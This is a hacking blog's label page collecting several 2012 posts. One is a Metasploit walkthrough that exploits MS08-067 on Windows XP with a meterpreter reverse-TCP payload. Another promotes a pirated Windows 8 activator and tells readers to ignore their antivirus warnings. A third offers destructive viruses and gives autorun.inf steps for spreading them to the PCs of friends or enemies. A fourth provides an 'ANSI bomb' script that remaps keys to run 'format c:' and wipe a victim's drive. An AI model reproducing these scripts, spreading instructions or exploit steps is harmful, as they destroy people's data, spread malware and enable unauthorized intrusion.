Showing posts with label PC Hacking. Show all posts
Showing posts with label PC Hacking. Show all posts

Friday, 28 December 2012

Hacking Windows XP Using Backtrack


In this article i am going to demonstrate how to hack a remote computer by exploiting the  parsing flaw in the pathcanonicalization code of NetAPI32.dll through the Server Service(CVE-2008-4250). Before we jump into the actual exploitation process, let me give more details about this Server Service Vulnerability.


Details about Server Service Vulnerability(MS08-067):
 

Microsoft Windows Server service provides support for sharing resources such as files and print services over the network.

The Server service is vulnerable to a remote code-executionvulnerability. The vulnerability is caused due to an error innetapi32.dll when processing directory traversal character sequences in path names. This can be exploited to corrupt stack memory by e.g. sending RPC requests containing specially crafted path names to the Server Service component. The 'NetprPathCanonicalize()' function in the 'netapi32.dll' file is affected.

A malicious request to vulnerable system results in complete compromise of vulnerable computers.
This vulnerability affects Windows XP, Windows 2000, Windows Server 2003, Windows Vista, and Windows Server 2008. But Attackers require authenticated access on Windows Vista and Server 2008 platforms to exploit this issue.


Exploiting the MS08-067 using Metasploit:

Requirements:

  •     VirtualBox

  •     Backtrack 5

  •     Target OS(XP)


Step 1:

Create Two Virtual Machine(VM) namely "Target" and "BT5".  Install the XP inside Target VM and Backtrack inside BT5. Start the Two VMs.



Step 2: Find the IP address of Target

 

Open The command prompt in the Target machine(XP). Type "ipconfig" to find the IP address of the Target system.

 

Step 3: Information Gathering
 

Now let us collect some information about the Target machine.  For this purpose , we are going to use the nmap tool.

Open The Terminal in the BT5 machine(Backtrack) and type "nmap -O 192.168.56.12".  Here 192.168.56.12 is IP address of Target machine. If you look at the result, you can find the list of open ports and OS version.



 Step 4: Metasploit
 

Now open the Terminal in the BT5 machine(Backtrack) and Type "msfconsole".

The msfconsole is the most popular interface to the Metasploit Framework. It provides an "all-in-one" centralized console and allows you efficient access to virtually all of the options available in the Metasploit Framework.

Let us use the Search command to find the exploit modules with the keyword netapi. Type "search netapi".  Now you can see the list of modules match with the netapi.



We are going to exploit MS08-067 , so type "use exploit/windows/smb/ms08_067_netapi".

Step 5: Set Payload
 

As usual, let use the Reverse Tcp Payload for this exploit also. Type "set payload windows/meterpreter/reverse_tcp" in the msfconsole.

Step 6: Options
 

Type "set LHOST 192.168.56.10".  Here 192.168.56.10 is IP address of Backtrack machine.  You can find the ip address by typing 'ifconfig' command in the Terminal.

Type "set RHOST 192.168.56.12".  Here 192.168.56.12 is IP address of Target machine.










Step 7: Exploiting
 

Ok, it is time to exploit the vulnerability, type "exploit" in the console. If the exploit is successful, you can see the following result.












Now we can control the remote computer using the meterpreter. For example, typing "screenshot" will grab the screenshot of the victim system.


I hope you understand and enjoy this...........................

Read more ...

How to Crack Passwords With C-Force

This summary is not available. Please click here to view the post.
Read more ...

Wednesday, 19 December 2012

WINDOWS 8 ACTIVATOR CRACK FOR ALL EDITION


Difficulty: Easy
Introduction: In this tutorial we will tech you how to crack windows 8 pro using windows 8 pro crack.


WINDOWS 8 ACTIVATOR CRACK

Windows 8 activator crack works on all edition of windows. You can crack all series of windows. this crack is very easy to use also. This windows 8 activator crack also supports korean language. Antivirus detects this as a virus because this app access the registry. So really it is not a virus. It is just a windows 8 activator . This crack works for windows 8 professional and windows 8 enterprise version.

INSTALLING WINDOWS 8 ACTIVATOR CRACK

  1. Extract the zip
  2. Install the Activator
  3. Open The Activator
  4. Click on Windows 8 Install/Uninstall
  5. Press and click enter
  6. Wait for some time and your windows is cracked
Antivirus Detects this as a virus. Because it access windows registry.
This Crack Works on all series of Windows 8
The download link for windows is add as torrent. Hosting windows 8 on other sites will be quickly removed due to DMCA. This torrent file is not uploaded by us and we do not hold any responsibility for the products damage etc. we just linked to the file
                   DOWNLOAD
Read more ...

DOWNLOAD DEADLY VIRUS [WINDOWS]


Difficulty: Easy
Introduction: Highly Deadly Virus that will destroy on excluding. This virus are used for destructive purpose


WHAT ARE DEADLY VIRUS ?

Deadly Virus are used for destruction. They can erase all your data on hard disk, they can self duplication, they limit you from connecting to internet. they limit you from the administrator power, they self copy when removable devices are connected. they disable the antivirus on excluding.

DOWNLOADING DEADLY VIRUS

We are posting some of the best virus available on internet. You can use this viruses to destroy computers. This are multi purpose virus. They have all the property like self duplication, limiting administrator power, self copying to removable devices. You use this virus to trick your friends etc.

INSTRUCTION ON USING THIS DEADLY VIRUS

If you what to spread this virus from removable disk like pen drive etc. You can make autorun the virus. Do not try to run this virus on your pc. It will ruin your softwares, OS and personal files. You can use this on your friends pc if you have any enmity with him. The virus are highly dangerous. I ones more repeat never test this on your computer.

HOW TO AUTORUN DEADLY VIRUS

  • Open notepad copy the below text
[autorun]

open=VIRUS FILE NAME WITH EXTENSION

  • Change VIRUS NAME WITH EXTENSION. To the name of the virus and with it�s extension.
  • Save the file as autorun.inf
  • Place the autorun.inf and the virus on the root dir of the removable device
  • If you want you can hide the file
We have added the deadly virus in a zip file. You should extract the files before adding to autorun
Never try to exclude the virus on your computer

DOWNLOAD DEADLY VIRUS

We have added 4 Deadly Virus. They are�
Read more ...

Saturday, 15 December 2012

Format Your Enemy's Full Cotrol Wit ANSI Bomb


What is ANSI Bomb and How to Make It By Yourself

What is an ANSI Bomb?

An ANSI bomb is not necessarily a virus, but more of a computer exploit. By using an ANSI bomb, you can get your victim's hard drive completely wiped.

How does an ANSI Bomb work? 

An ANSI Bomb is scripted through a Text Document, and then saved as a Microsoft batch file. It is simply a few lines of code. An ANSI bomb reroutes a few letters on the keyboard. This particular one reroutes the letter 'C,' 'Enter,' and 'Backspace' to the command 'Format C:.' It also reroutes the letters 'nN' to 'yY.' 'yY' also remains 'yY.' 


What's The Point?
If you hate someone, this is the exploit for you. Simple, yet effective. Software companies also face these with stolen software sometimes.

What will this exploit do?

When the victim clicks on the batch, the exploit is activated. When they press any of the rerouted keys, it will prompt them with a message "Are you sure you would like to format C:/? Y/N." Now, obviously your victim will press 'nN.' But the great part about an ANSI bomb, is that though they press 'nN', the computer recognizes it as 'yY', thus wiping their hard-drive, and all their hard work.

To make an ANSI bomb, copy the following script into a text document, click 'Save As,' use the drop down menu and select 'All Files,' then save it with the file extension .bat -- And that's it! You're done!


Script :

ESC[99;"format c:";13p
ESC
[66;"format c:";13p
ESC
[121;121;13p
ESC
[89;89;13p
ESC
[110;121;13p
ESC
[78;89;13p
ESC
[8;format c:";13p
ESC[0;0;89;13p
ESC[3;89;13p
ESC[100;"
copy key.ans c:\";13;"copy con c:\autoexec.bat";13;"type key.ans";13;26;13;"cls";13p
ESC[68;"
copy key.ans c:\";13;"copy con c:\autoexec.bat";13;"type key.ans";13;26;13;"cls";13p
ESC[116;"
copy key.ans c:\";13;"copy con c:\autoexec.bat";13;"type key.ans";13;26;13;"cls";13p
ESC[84;"
copy key.ans c:\";13;"copy con c:\autoexec.bat";13;"type key.ans";13;26;13;"cls";13p
ESC[0;59;"
Fuck You Bitch!"p


Read more ...